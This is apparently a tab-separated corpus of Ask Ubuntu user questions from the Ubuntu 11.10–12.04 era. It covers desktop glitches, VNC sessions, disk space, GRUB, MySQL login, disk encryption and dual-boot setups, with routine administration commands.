120445	every program is executed in terminal windows when opened using run dialog	i am facing a strange problem with my laptop , i have ubuntu 12.04 installed with xfce4 as the desktop . whenever i open any new program like firefox by typing firefox in run dialog window , it opens a terminal in the background . please refer this screenshot . has anybody else faced this problem earlier ? i was not able to find a similar kind of issue anywhere else . by the way , im using xfce4.8 as desktop ? is this issue with xfce desktop ?
120450	what is the version numbering logic for open source developers managing software releases ?	i guess this is more of a general question that i cant find the the answer to anywhere . what is the version numbering logic for open source developers managing software releases and is there any governance or guidance i can read up on . the origins of this question comes from me reviewing and researching software on countless websites that i would like to use on my ubuntu os . through experience , i am learning some sites are much better than others explaining if a release is a stable , experimental or maintenance release but these explanations are not consistent with any version numbering logic i am familiar with .
120473	thumbnails for certain formats not appearing in nautilus	the following formats do not have an icon in nautilus : .odt .odb and , some of my older documents are missing their thumbnails , all of which are either .odt or .odp . i just purged and reinstalled libreoffice today ... could this be the reason why ? edit : sorry about my vagueness i am on ubuntu 11.10 , using libreoffice 3.4 340m1 ( build:402 ) that comes by default in the repos . here 's a screenshot of what i see for these formats .
120475	why ca n't i get a working session with vnc4server	we have a couple of ( identical ) ubuntu 11.10 machines , configured with gnome-classic , which we use as remote servers , and let our clients log into personal user accounts we create for them using vnc4server . we configured all the machines in the same way , following a short manual we compiled , describing how to download , install and prepare a few tools and our software . the connection usually works fine , but today i set up a fresh machine , and experienced problems . after installing vnc4server , i ran vncpasswd and copied the following startup file to ~/.vnc/xstartup : # ! /bin/sh unset session_manager unset dbus_session_bus_address gnome-session -- session=gnome-classic & [ -x /etc/vnc/xstartup ] & & exec /etc/vnc/xstartup [ -r $ home/.xresources ] & & xrdb $ home/.xresources xsetroot -solid grey vncconfig -iconic & then , i started vnc4server and used two viewers ( the ubuntu remote desktop viewer and windows realvnc client ) in two other machines , but instead of getting my desktop , i see an empty window with a grey-ish background pattern like this : and the cursor is a bold x . what is wrong with the setup and why do n't i get a remote session as expected ?
120476	how can i implement full disk encryption for a disk containing ubuntu with plausible deniability ?	i would like to have a disk that : has ubuntu installed is fully encrypted is setup in such a way as to make denial of the existence of the ubuntu install plausible truecrypt provides the last two features but only for windows : http : //www.truecrypt.org/docs/ ? s=sys-encryption-supported-os the alternate installer for ubuntu provides the first two features but not the last . i imagine that plausible deniability would be achieved by , at least : having two installs of ubuntu and 2 passphrases ( or keyfiles ) which would unencrypt each one . moving any unencrypted data ( such as /boot ) onto a usb stick are there any programs out there which support this feature set for ubuntu ?
120484	how to re-partition ?	i switched from windows to ubuntu 4 months ago and i am really happy with it . i set up a dual-boot system ( since i wasnâ´t sure how it will end up with me and ubuntu ) . after merging from citavi to zotero i need windows only for my scanner . the problem i have now is , that the windows partition is so big with lots of unused space and the ubuntu partition are quite small - i should have though about this problem 4 months ago ... my partitions look like this : where sda3 is the windows partition , sda5 is ubuntu and sda7 is a data partition . i want to shrink sda3 and free some space for sda5 and sda7 . how can this be done safely ( and easily ) ?
120490	how can i save an email from thunderbird ?	how can i save a complete email from thunderbird to a file in home ? i have tried draging and copying without success .
120495	update manager not working due to missing cd-rom	w : failed to fetch cdrom : //ubuntu 11.10 oneiric ocelot - release i386 ( 20111012 ) /dists/oneiric/main/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms , w : failed to fetch cdrom : //ubuntu 11.10 oneiric ocelot - release i386 ( 20111012 ) /dists/oneiric/restricted/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms , e : some index files failed to download . they have been ignored , or old ones used instead . this happens when i hit the check button ? and the updates were working before .
120503	no internet connection - ubuntu 11.10	i installed ubuntu 11.10 recently . after the first bootup the computer freezes so i have to force-quit my computer . then i turned on my computer after that . i tried connecting to the internet . my ( and my neighbor 's ) wireless networks shown up , but no matter how many times i tried , i ca n't connect to my home network . i checked the password and the other laptop 's internet works ( a macbookpro ) . it was a wireless network . what 's weird is that the wireless network worked when i was installing ubuntu how can i connect to the internet now ? i do n't have a wired network . please help ! any help will be appreciated specs : asus f81se , windows 7 dual-boot , card : atheros ar928x , 4gb ram
120521	i know my root password , so where do i type it to open this file ?	i have my root password , and just installed a keylogger for myself and after losing a long chunk of text i worked really hard on to a program crash . the keylogger installed just fine , using my root password in the terminal worked fine to , set the output file and started it . now how do i look at the output file ? under permissions , it say 's that only root can read/write . how do i log in as root ?
120528	app to make a video from photos ?	i was wondering what could be a good app ( with a gui ; ) ) for making a video from a bunch of photos or images , to create a time-lapse video , or a stop-motion animation , or even a video like this one . the idea is to set a really small time between each photo , but also to be able to change this time every so often , or add some effects , to make the succession smoother in particular . what would be perfect is a function that allows automatic cropping of the photos as well as exposure adjustment so they all have the same background and so the time-lapse video looks smoother . i know about the slide show app `` imagination '' but the interval can not go under one second . edit : here is my progress , also thanks to the first answer : i tried luciole , it is really simple and promising , but pretty buggy , and i only could export an average video in .dv format ( mpg2 and avi do n't work ) . apparently , it has difficulties when changing the fps . i also tried stopmotion : also pretty buggy , i had to go into preferences and modify the encoding commands to get a result , but it 's the best result i got so far . but none of those has effects to make transitions smoother ... i tried several diaporama apps : imagination does n't handle more than 1 image per second ; photofilmstrip ( repo version and latest version from website ) : same problem even though you can go down to 0.1 second per image , it still behaves wierdly ( going back to 1 second automatically ) ; videoporama : does n't start at all on 12.04 . any other suggestions ?
120531	synaptic dependency error	every time i install/remove something via synaptic , i always get this error e : foomatic-filters : subprocess installed post-installation script returned error exit status 10 e : rsyslog : subprocess installed post-installation script returned error exit status 10 e : foo2zjs : dependency problems - leaving unconfigured e : samba-common : subprocess installed post-installation script returned error exit status 10 e : samba-common-bin : dependency problems - leaving unconfigured e : smbclient : dependency problems - leaving unconfigured the following is what i get from executing the following command : sudo dpkg -- configure -a http : //pastebin.com/h1ccjdkf if you happen to know what this error really mean and how i can fix it ( if it is necessary + easy to do so ) please let me know ! thanks in advance ! fyi : my problem was actually to get musicbrainz picard installed on my ubuntu natty but after several reinstallations , the programme still fails to start up . i am wondering whether the error i get from synaptic is an explanation to this . the following is the error i get from installing picard from the software centre http : //pastebin.com/eddrm3c1 thankyou very much
120558	the mystery of the vanishing disk space	my disk space is dwindling by about 2gb a day ! i only have a few more days before i run out of space . $ df -h filesystem size used avail use % mounted on /dev/sda4 143g 126g 11g 93 % / udev 491m 4.0k 491m 1 % /dev tmpfs 200m 696k 199m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 499m 144k 499m 1 % /run/shm /dev/sda2 1.9g 580m 1.2g 33 % /tmp /dev/sda1 92m 29m 58m 33 % /boot i have been searching for the biggest directories/log files , deleting and compressing . but i am still losing the war . finally , i realised i have a big misunderstanding : julian @ server1 : ~ $ sudo du -h / | tail -n 1 16g / all of my files in / only add up to 16 gb . that leaves 110 gb unaccounted for ! clearly i have a misunderstanding : i thought the '/dev/sda4 ' line represented all the files visible from '/ ' . what should i be reading to understand where the other storage has gone ? more details : i have an ubuntu 11.10 server , that was set-up by data-center staff . it is running my own code ( which is fairly prolific with log files , but otherwise does n't store much stuff on the drive ) duplicity for backups ( which tends to store a lot of signature files ) various other standard services , like apache , nagios , etc . they are very lightly used . it has been up for about 4 months without a reboot . i lied about the du output ( simplified it for effect ) . it also complained about not being able to access gvfs and the du processes 's own resources . i believe they are irrelevant : . du : can not access `/home/julian/.gvfs ' : permission denied du : can not access `/proc/10841/task/10841/fd/4 ' : no such file or directory du : can not access `/proc/10841/task/10841/fdinfo/4 ' : no such file or directory du : can not access `/proc/10841/fd/4 ' : no such file or directory du : can not access `/proc/10841/fdinfo/4 ' : no such file or directory
120561	how to run files and open folders as an administrater 11.10	solved ! ! ! enable open as administrator in nautilus ! to get started , press ctrl â alt â t on your keyboard to open terminal . when it opens , run the commands below : enter code here sudo apt-get install nautilus-gksu after installing that application run copy and paste the line below and press enter . sudo cp /usr/lib/nautilus/extensions-2.0/libnautilus-gksu.so /usr/lib/nautilus/extensions-3.0/ finally , log out and back in then go and test it , by clicking your right mouse click on the file you want to run as admin and your see a popup menu with the words : open as administrater . visit : http : //www.liberiangeek.net/2011/12/add-open-as-administrator-to-nautilus-context-menu-in-ubuntu-11-10-oneiric-ocelot/ for help and from here . enjoy !
120570	need help for alarm	recently i have switched to ubuntu from windows just because i like to explorer new areas but sticked here at ubuntu but there is a problem that i am a heavy sleeper and need alarm that wakes me in morning for my uni i have tried my alarms in ubuntu but couldnt find anyone that wakes my computer from sleepmode or from hibernation is there any software that does that thing need help please
120596	live log of commands run by a user	i need a live log of all the processes run by the root user , so that i can just tail the file or something , i know there is /root/.bash_history but that is not updated until the session has ended . is there a way i can set it up so that commands are written live to the end of a file ?
120597	gtk-sharp mono installation problem	i am using ubuntu 11.11 and mono , under references/gtk-sharp , i am shown '' assembly not available for mono/.net 2.0 ( in mono 2.10.5 ) '' how do i resolve this ?
120599	can i use linux safely and sell on ebay ?	i sell things on ebay here and there and i have always used windows . is linux safe enough to do my ebay dealings ? is there anything related to linux i need to download to be keep passwords and money safe ? thanks in advance .
120607	overheating on dell studio xps 1645	so i was wondering if anyone else has come upon this problem , and/or has come up with a solution . when i use my ubuntu partition , my computer becomes extremely hot , and the fan runs very noisily for a very long time . if i reboot into windows while this is happening , my computer actually begins to cool down while doing the exact same tasks . thinking this might just be a bug with ubuntu , i installed fedora on another partition , and the same problem occurs . is this a problem with the kernel ? cpufreq tells me that my cpu is running at 933 mhz out of a possible 1.6 ghz from my intel core i7 cpu q70 . for anyone who wants more information , i have 8 gb of memory , and an ati mobility raedon hd 5730 graphics card . i 'm open to any ideas anyone might have . thanks in advance !
120611	how does linux handle process synchronization ( mutual exclusion )	i am writing a academic paper on how linux ( more specifically ubuntu ) handles various operating systems concepts ( such as mutual exclusion , deadlocks , scheduling , virtual memory and paging ) . could someone please explain to me how exactly ubuntu ensures mutual exclusion ? does it makes use of semaphores ? and if so , how exactly does it use semaphores to ensure mutual exclusion ?
120614	will my all files be the same after updating from 10.04 to 12.04 ?	programs like skype , browsers etc . etc . and my all files . will it be the same after upgrading to 12.04 from 10.04 or i will have to reinstall everything ? thank you . edit : also , as i understood . only unity is available in 12.04 ? can i make it look like 10.04 ?
120615	processor virtualization support not getting detected	i have intel core 2 duo processor . in the bios i 've enabled the processor support for vt - virtualization technology . but when i ran the following command no output is shown grep -- color vmx /proc/cpuinfo egrep ' ( vmx|svm ) ' /proc/cpuinfo how to fix this problem ? i want virtualization support to run certain operating systems inside the virtualbox virtual machines . i 'm running ubuntu 12.04 beta 2 . linux 3.2-pae flavour any suggestions or solutions ? my cpu capabilities are shown by lshw like this boot fpu fpu_exception wp vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx x86-64 constant_tsc arch_perfmon pebs bts aperfmperf pni dtes64 monitor ds_cpl est tm2 ssse3 cx16 xtpr pdcm sse4_1 xsave lahf_lm cpufreq i see vme..but not vmx ... what is the difference between vme and vmx capabilities ?
120621	how to fix duplicate sources.list entry ?	i keep getting this warning whenever i try to run sudo apt-get update . w : duplicate sources.list entry http : //archive.ubuntu.com/ubuntu/ precise-updates/main i386 packages ( /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise-updates_main_binary-i386_packages ) w : you may want to run apt-get update to correct these problems below is the output from /etc/apt/sources.list file : deb http : //archive.ubuntu.com/ubuntu precise main restricted deb-src http : //archive.ubuntu.com/ubuntu precise main restricted deb http : //archive.ubuntu.com/ubuntu precise-updates main restricted deb-src http : //archive.ubuntu.com/ubuntu precise-updates main restricted deb http : //archive.ubuntu.com/ubuntu precise universe deb-src http : //archive.ubuntu.com/ubuntu precise universe deb http : //archive.ubuntu.com/ubuntu precise-updates universe deb-src http : //archive.ubuntu.com/ubuntu precise-updates universe deb http : //archive.ubuntu.com/ubuntu precise multiverse deb-src http : //archive.ubuntu.com/ubuntu precise multiverse deb http : //archive.ubuntu.com/ubuntu precise-updates multiverse deb-src http : //archive.ubuntu.com/ubuntu precise-updates multiverse deb http : //archive.ubuntu.com/ubuntu precise-security main restricted deb-src http : //archive.ubuntu.com/ubuntu precise-security main restricted deb http : //archive.ubuntu.com/ubuntu precise-security universe deb-src http : //archive.ubuntu.com/ubuntu precise-security universe deb http : //archive.ubuntu.com/ubuntu precise-security multiverse deb-src http : //archive.ubuntu.com/ubuntu precise-security multiverse how do i fix it ?
120623	what laptop pre-loaded with ubuntu can i get with a pointing stick ?	are there any manufacturers who ship laptops with ubuntu as the default os and also have a pointing stick ( trackpoint ) ? i found several companies like system76 who have great-looking laptops , but none have the trackpoint . i have been a thinkpad user for 10 years now and ca n't imagine not having a trackpoint .
120624	how to change ubuntu studio from xfce to gnome ?	i have 12.04 ubuntu studio installed at the moment . on removing a application called terminal emulator , i accidentally removed xfce too . as i am not very fond of xfce , i am ok with it as i can change the session to gnome 3 upon login . but session runs with occasional glitches . my question is how to remove xfce completely and turn it into pure gnome system . i am aware of the way to do apt-get install ubuntu-desktop but , this is going to change the ubuntu studio , i dont want that . i just want to change my ubuntu studio to pure gnome without uninstalling ubuntu-desktop . i.e . something like ubuntustudio-12.04-gnome build . i 've looked at this q & a : how to remove xubuntu ? the accepted answer removes some vital software from ubuntu studio such as gimp , including ubuntustudio-desktop at the end .
120628	ifconfig : command 'ifconfig ' is available in '/sbin/ifconfig '	my question is related to another open question . my echo $ path gives me an output which is like /home/sahil/.rvm/gems/ruby-1.9.3-p125/bin : /home/sahil/.rvm/gems/ruby-1.9.3-p125 @ global/bin : /home/sahil/.rvm/rubies/ruby-1.9.3-p125/bin : /home/sahil/.rvm/bin : /usr/local/bin : /usr/bin : /bin : /usr/games : /home/sahil/.rvm/bin { } : /home/android-sdks/ { } : /home/android-sdks/platform-tools/ { } : /home/android-sdks/tools/ { } : /home/sahil/android-sdks/tools { } : /home/sahil/android-sdks/tools : /home/sahil/android-sdks/platform-tools/ but running ifconfig gives me an output like command 'ifconfig ' is available in '/sbin/ifconfig' the command could not be located because '/sbin ' is not included in the path environment variable . this is most likely caused by the lack of administrative privileges associated with your user account . ifconfig : command not found after running command like given in other question export path= '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games '' it runs ifconfig but blocks other commands of ruby rails or rvm . seeking help how to resolve this . also why this happens ?
120630	how many packages are in the main repository ?	this sounds like it should be a fairly straightforward question to answer but i have n't found it yet , only figures of main + universe , which is various figures over 24,000 depending on release .
120633	how to enable battery status indicator in gnome shell ?	i 'm using ubuntu precise with gnome shell on a dell latitude e6520 and i 'm missing the battery status icon . when i run gnome-power-statistics then the battery info is displayed correctly so i 'm sure linux and gnome can see the battery ( so there is no acpi problem ) . but there simply is no indicator icon in the gnome shell menu bar . in the power settings the combo box show battery status in the menu bar is always empty . i can choose between the values when battery is present , when battery is charging/in use and never but it does n't matter what i select here , the icon never appears and when i exit the power settings and open it again then the combo box is again empty . i also used the command dconf -- watch / to see what this combo box changes in the dconf settings . no output at all . so for some reason this combo box is totally broken . i also tried it with a completely new user with a fresh gnome configuration . the battery status icon was there the first time i logged in but disappeared on second login . i also tried upgrading gnome to the version distributed by the gnome 3 team , does n't help . i 'm out of options . any ideas ?
120635	how do i hide the panels in fallback mode using the command line ?	i want to hide the panels via script . in maverick i used gconftool-2 -- set `` /apps/panel/toplevels/top_panel_screen0/auto_hide '' -- type bool `` true '' now i tried gsettings set org.gnome.gnome-panel.layout ... but there is a problem : gsettings list-keys org.gnome.gnome-panel.layout tells me : object-id-list toplevel-id-list but in dconf editor there are 2 subfolder layers called toplevels and then top-panel /bottom-panel i have no idea how to get there . it should be toplevels.top-panel auto_hide true i tried all different things to get there ... no way . does that mean you can not change these values from commandline any more ?
120640	unity toolbar icons disappear on boot	my toolbar icons sometimes are missing on boot . i have no idea why . another odd thing that could be related is it seems sometimes my terminal windows do n't have transparency on boot . ( i have a terminator session that starts on boot ) new terminal windows have transparency though . upgraded to 12.04 hoping it would solve this issue and on first boot it did . then rebooted and it is back to the old missing icons . i have a filling it is some edit/or change with ubuntu tweak or myunity gone wrong . how can i fix this . i do n't have terminator loading at boot but still the same problem . http : //i.stack.imgur.com/lnc5d.jpg
120642	how to install easybcd ?	i want to delete ubuntu 11.10 from dual boot system ( windows 7 + ubuntu 11.10 ) . i currently have ubuntu as main os but i do n't want to continue with it further.i do n't have cd for win 7 so i am trying other sources . i have downloaded easybcd on another system and pasted it on ubuntu . it is .exe file and is not running on ubuntu . i am not aware of any commands regarding installation and further process . : ( so , pls suggest what to do next , i would be very thankful . : )
120643	unable to mount encrypted drive	error starting job : failed to execute child process `` cryptsetup '' ( no such file or directory ) after a system reinstall ( i 'm on ubuntu 10.04 ) , i 'm having trouble accessing my second hard disk , when i try to mount the encrypted volume i am prompted to enter the password , when i do i receive the above error . any thoughts ?
120645	running a script after the gui has loaded	i know how to run a program on boot , on login ( system > preferences > startup applications ) or on opening a shell ( .bashrc ) . i also did read `` execute script after desktop loaded ? '' . what i realized that every application added to startup applications extends the time until the desktop becomes usable . so i 'm looking for a way to start all the `` nice to haves '' from a script ( got that working ) that runs after the regular startup is finished . i 'm not fully clear how to get there . would i use a second script that calls the first one with & ( so it runs in the background ) and add a wait for ( a few seconds|specific event ) to the first one ?
120651	how can i get current song information	i want to know how can i get the current song information ( title , artist , album etc ) no matter what player is running . i saw some kde widget can do that . how can i do that ? is there any standard protocol or interface to get song information ?
120657	can i encrypt whole hard drive when dual boot ubuntu/win 7 installed on same drive ? if so what program ?	i am seeking a program that can encrypt a whole hard drive when ubuntu 12.04/ windows 7 installed on the same drive ( different partitions ) using a grub loader . i can not seem to get truecrypt to accept this , and i am curious if there is a work around ( lol ) or another open source encryption program anyone may suggest ? thanks !
120658	why does the sudo command not work in chroot ?	i just installed a 32-bit chroot to run on my 64-bit system . in the chroot environment , the sudo command does n't work , it says sudo : command not found also , when i try the su root command , my password does n't work ( su : authentication failure ) . what password do they want ? i 'm quite new to ubuntu , so actually i do n't really know what i 'm doing . i am just trying to follow instructions . i solved this particular problem simply by starting the chroot by the command : katarina @ ubuntu : ~ $ schroot -c oneiric_i386 -u root instead of the one i used the first time : katarina @ ubuntu : ~ $ schroot -a i still have some other problems , but i guess that 's not for this question .
120665	will glade 3.12 work for ubuntu 11.10 using unity ... no gnome 3	i 'm in the process of learning 'quickly ' and noticed that it only has 'glade 3.8.0 ' and i like to keep all my apps fully up to date . i noticed however on the gnome.org site it said that 'glade 3.12 ' has to be used with 'gtk+3 ' . can i install 'gtk+3 ' on 'oneiric ' without using any of that 'gnome 3 ' nonsense or what ? thank you !
120667	ubuntu for android on the asus transformer prime	i would like to use ubuntu on my transformer prime in parallel with android ( not as a dual booting solution , i want to be able to switch between them instantaniously ) . i am aware of the traditional chrooting/vnc solution but i heard that it performs very poorly so i would like to use ubuntu for android ( ufa ) which has been announced recently by canonical . that looks like a polished , highly integrated solution for android devices . the prime would be the ideal device for ubuntu for android since it has a powerful processor ( tegra3 ) capable of running a lot of processes in parallel on its 4 cores . does anyone know if canonical or anybody else is working on supporting ufa on the asus transformer prime ? as far as i understand , the x11 driver is available for tegra3 so , the biggest hurdle may be easily overcome .
120668	browser without gpu support	google has an easter egg that draws 3d graph but when i tried it out on chrome it complained about no webgl support . i 've also tested it on firefox whose webgl support was enabled but ended up with the same problem . thus , i suspect it 's an issue of my gpu . some googling led me to chrome : //gpu and here 's what i got graphics feature status canvas : software only , hardware acceleration unavailable html rendering : software only , hardware acceleration unavailable 3d css : unavailable . hardware acceleration unavailable webgl : unavailable . hardware acceleration unavailable webgl multisampling : unavailable . hardware acceleration unavailable problems detected gpu process was unable to boot . access to gpu disallowed . gl driver is software rendered . accelerated compositing is disabled . : 59302 mesa drivers in linux older than 7.11 are assumed to be buggy . accelerated 2d canvas is unstable in linux at the moment . version information data exported tue apr 10 2012 18:35:57 gmt+0800 ( cst ) chrome version 18.0.1025.151 ( official build 130497 ) operating system linux 3.0.0-0300-generic software rendering list version 1.27 angle revision 988 2d graphics backend skia i wonder what each of the problem implies and how i may properly deal with it ? i 'm using ubuntu 11.04
120671	ubuntu 11.10 rebooting fails	i have ubuntu 11.10 installed on my netbook . when try to restart my computer the ubuntu logo opens and it attempts to restart . however after the ubuntu screen disappears it goes to a black screen and my computer just stays on . it wo n't reboot to grub allowing me to choose between windows or ubuntu
120680	apt-get install kernel source error	apt-get source linux-image- $ ( uname -r ) gives me the below error reading package lists ... done building dependency tree reading state information ... done picking 'linux ' as source package instead of 'linux-image-3.0.0-12-generic' notice : 'linux ' packaging is maintained in the 'git ' version control system at : http : //kernel.ubuntu.com/git-repos/ubuntu/ubuntu-oneiric.git skipping already downloaded file 'linux_3.0.0-17.30.dsc' need to get 99.9 mb of source archives . err http : //pk.archive.ubuntu.com/ubuntu/ oneiric-updates/main linux 3.0.0-17.30 ( tar ) 500 ( the request was rejected by the http filter . contact your isa server administrator. ) err http : //pk.archive.ubuntu.com/ubuntu/ oneiric-updates/main linux 3.0.0-17.30 ( diff ) 500 ( the request was rejected by the http filter . contact your isa server administrator. ) failed to fetch http : //pk.archive.ubuntu.com/ubuntu/pool/main/l/linux/linux_3.0.0.orig.tar.gz 500 ( the request was rejected by the http filter . contact your isa server administratorthe request was rejected by the http filter . contact your isa server administrator. ) failed to fetch http : //pk.archive.ubuntu.com/ubuntu/pool/main/l/linux/linux_3.0.0-17.30.diff.gz 500 ( the request was rejected by the http filter . contact your isa server administrator. ) e : failed to fetch some archives . can someone suggest a solution ?
120691	xscreensaver already locked ?	i 'm no longer able to lock my screen with ctrl-alt-l , and $ xscreensaver-command -lock xscreensaver-command : already locked . what is going on here ? is this functionality broken ? xscreensaver-command -activate still works , but that does n't prompt for the password when dismissing . $ uname -a linux hostname 3.0.0-17-generic # 30-ubuntu smp thu mar 8 20:45:39 utc 2012 x86_64 x86_64 x86_64 gnu/linux
120693	emulator for iphone/ipod/ipad apps	is there any emulator for linux which fully supports apple iphone/iphone/ipad apps ? any other way to run such apps on linux ?
120694	why does aptitude list a package as not installed while dpkg says it is installed ?	when i stat on my 11.10 machine aptitude search lightdm i get this : p gir1.2-lightdm-1 - typelib file for liblightdm-1 p liblightdm-gobject-1-0 - lightdm gobject client library p liblightdm-gobject-1-dev - lightdm client library ( development files p liblightdm-gobject-1-doc - lightdm client library ( documentation ) p liblightdm-qt-1-0 - lightdm qt client library p liblightdm-qt-1-dev - lightdm client library ( development files p lightdm - display manager v lightdm-greeter - v lightdm-greeter - v lightdm-greeter-example-gtk - v lightdm-greeter-example-gtk - p lightdm-gtk-greeter - lightdm gtk+ greeter v lightdm-gtk-greeter-config - v lightdm-gtk-greeter-config - p lightdm-qt-greeter - lightdm qt greeter p mythbuntu-lightdm-theme - mythbuntu lightdm setup however my system currently runs with lightdm and dpkg -l | grep -i lightdm says : ii liblightdm-gobject-1-0 1.0.6-0ubuntu1.6 lightdm gobject client library ii lightdm 1.0.6-0ubuntu1.6 display manager when i try to install lightdm via apt or via aptitude nothing happens as it seems to be already installed . so i guess aptitude is not working properly ?
120711	firefox 's slow starting	what happened with mozilla firefox ? after updating my ubuntu 11.10 , firefox its starting very slow . the last update was thunderbird , chromium and flash player , nothing about firefox . do you experience the same issue ? how can it be corrected ? thanks .
120716	mounting hard-drive on boot	i had 2 hdd , today i bought a new one , i would like to mount this hdd at boot , it 's working , but the new hdd mounted under robu not root , why ? content of the fstab : uuid=8e492a04-c05d-4861-b996-a36ebbaf3d43 /media/wesys_raid ext4 rw 0 0 uuid=12c81f25c81f071f /media/wesys_data ntfs defaults , iocharset=utf8 0 0 /dev/mapper/wesys_lvm /media/wesys_lvm ext4 rw 0 0 this is the rights . drwxrwxrwx 1 root root 4096 2012-04-05 11:51 wesys_data drwxr-xr-x 9 root root 4096 2012-03-01 10:11 wesys_lvm drwx -- -- -- 3 robu robu 4096 2012-04-10 12:33 wesys_raid
120718	ca n't log to mysql	even after i reset root password with following command i can not log to mysql : ( other command listed to provide additional info ) # sudo dpkg-reconfigure mysql-server-5.1 # mysql -u root -p enter password : error 1045 ( 28000 ) : access denied for user 'root ' @ 'localhost ' ( using password : yes ) # telnet 127.0.0.1 3306 trying 127.0.0.1 ... telnet : unable to connect to remote host : connection refused # ps -aw |grep mysql 26522 ? 00:00:00 mysqld # /etc/init.d/mysql start rather than invoking init scripts through /etc/init.d , use the service ( 8 ) utility , e.g . service mysql start since the script you are attempting to invoke has been converted to an upstart job , you may also use the start ( 8 ) utility , e.g . start mysql update : # sudo mysqladmin -u root password 123 mysqladmin : connect to server at 'localhost ' failed it seems mysql is not ruining properly
120721	no icons when adding custom submenus to panel	i made some custom categories in the gnome-main-menu , and added some .directory files which describe that category and point to its icon . i also changed the icon of standard categories ( i.e . programming ) with .directory files in .local/share/desktop-directories . these customizations get displayed fine in gnome-main-menu . and now i want to add a category of the gnome-main-menu to the panel , as a sub-menu . i alt+rightclick the panel , choose `` add to panel '' , then `` applicationlauncher ... '' , choose a submenu ( not a .desktop launcher ) , and click `` add '' expected behaviour : the sub-menu is added to the panel , it 's icon gets displayed properly . one can click it and you have a working menu there . experienced behaviour : the custom category gets added , but the icon is missing . one can click on the menu , and it is working , but the icon is just not there . also , icons of standard categories that have been altered via .directory files to show a custom icon are displayed with their original icon , when added to panel like this . anyone have a clue ? did the desktop-directories folders/.directory files change in gtk/gnome3 ?
120724	how can i backup a phone running windows phone 7 ?	really the important bit is how can i backup the contacts . everything else can be transferred to a sd card . background : a friend get a present last christmas , a nokia lumia 900 , a phone running windows phone . now it 's faulty and he has to return it for exchange . the support person told him that he should make a backup using zune , but he only has a very old computer running lubuntu ( it has less than 400 mb of ram , virtualized windows wo n't run on that hardware ) . for now i can just sync it in my laptop ( powerful enough for virtualbox ) , but i 'd like to have some alternative for the future so that he can make a backup himself .
120725	open new windows on main screen in kde two-screen setup	i am using kde ( with kwin ) on two screens . often when i run a new application the new window shows on the second screen eventhough the mouse as well as the active window is on the main screen . how can i instruct kde to always open new windows on the main screen ?
120731	why does windows 7 overall performance is better than ubuntu 11.10 ?	i have a intel i7 2600 processor , 8gb ddr3 ram , nvidia gtx570 graphics card , and still ubuntu taking 45-50 seconds to boot and 32-35 seconds to power off , while windows 7 boots in only 20-25 seconds and shuts down in 10 seconds . both os has automatic login enabled , and obviously i am dual-booting . ubuntu is slow in pre loading stage too , and does n't show any boot splash after installing drivers and did n't recognize my nvidia graphics card on jockey gtk , i had to add `` x swat '' repository and that did n't worked . i installed proprietary drivers through terminal ( nvidia-common , nvidia-settings ) in order to have 3d acceleration . but it does n't make any difference on the speed . i also have a pentium 4 pc and in that pc , ubuntu 11.10 is way faster than windows 7 or xp with nvidia graphics card . and preload ( showing splash screen ) is good . here is my boot script , some words there are in spanish because my ubuntu is in spanish lanuage . i am not using wubi , ubuntu has its own partition , it is 64-bits , and matlab 2011 has very low performance compared to windows version .
120733	how can i get grub to take a different os as the default one ?	question how can i get grub to take a different os as the default one ? all the usual methods as explained on the ubuntu site have n't worked . the only thing i have n't tried yet is grub customizer out of fear to break something . the context i have multiple operating systems , among them two ubuntu 11.10 distros . two distinguish them , lets call them os a and b. i first installed a , spent a lot of time setting it up the way i like it to be , an then i installed b as an os with which i can fool around a bit . until now , grub worked fine . the problem was , after installing b grub is now set to start b as default and i ca n't change it . i tried different things ( like editing some files to change the start order and then updated grub via sudo update-grub ) , or using startup manager ( so the proposed answers askubuntu gives me for this question don ' count ) , but nothing helped . generally , i ca n't change anything in grub , not even other things like how long the screen with the oses is being displayed ( i wanted it to be as short as possible , but it 's still at 10 seconds ) . all attempts to do this were done from os a. i have n't tried grub customizer because there are a lot more entries shown there that at the boot process , so i do n't know whats happening with that . i also would like to remove some entries from the grub menu ( like different kernel version of the same os ) , but in grub customizer i 'm afraid to tick the wrong things off . here is my etc/default/grub file : # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . # for full documentation of the options in this file , see : # info -f grub -n 'simple configuration' grub_default=14 # grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=1 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' # uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernel that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal=console # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' # grub_gfxmode=640x480 # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux # grub_disable_linux_uuid=true # uncomment to disable generation of recovery mode menu entries # grub_disable_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 ''
120734	titlebar of the windows is not showing up	i ca n't see the titlebar anymore . the one with the close and minimize buttons , unless the window is in full screen . here is an image :
120741	install xp over ubuntu . ( flash drive )	my girlfriend needs to install windows xp over ubuntu on her pc , because she need to run some software that wine and a visual machine ca n't handle as well as the 'real ' thing . problem is , it seems very difficult to make a bootable flash drive with the files from a xp .iso from ubuntu . all the guides i could find was about windows 7 , formatting the usb as ntfs , then use unetbootin to extract the files to the usb . problem is , that only works with 7 , not xp . does anyone know how i can make a bootable xp flash drive ? thanks ! it 's really important .
120744	how to make ubuntu installed on other hdd password protected on windows 7 ?	ok so heres my question : i have 2 hdd one with windows 7 one with ubuntu 11.10.i want the hdd accesible from ubuntu and not on windows meaning that i want it so that nobody can access the file via windows nor format the drive unless there is the input of a password.thxs
